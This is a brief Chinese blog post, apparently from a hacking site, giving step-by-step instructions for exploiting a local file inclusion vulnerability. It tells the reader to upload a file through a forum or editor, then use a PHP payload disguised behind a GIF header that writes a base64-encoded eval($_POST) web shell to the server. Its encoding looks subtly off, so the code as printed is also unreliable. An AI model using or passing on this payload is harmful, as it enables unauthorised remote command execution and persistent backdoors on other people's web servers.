LFI漏洞使用心得

分类:安全 | 2012-02-12 | 撸过 60 次
0人扯谈

1.找到LFI本地包含的漏洞

2.想办法上传不管是通过bbs,FCKEDITOR或者其他任何方式

3.使用如下代码

gif89a0<?fputs(fopen("3.php", "w"), base64_decode("JTNDJTNGcGhwJTIwQGV2YWwlMjglMjRfUE9TVCU1Qm5vdGhhY2slNUQlMjklM0IlM0YlM0U="));?>

 

4.如果没有写入权限可以直接写脚本进行执行命令操作等

本站内容均为原创,转载请务必保留署名与链接!
LFI漏洞使用心得:https://www.webshell.cc/2947.html
标签: , ,

相关日志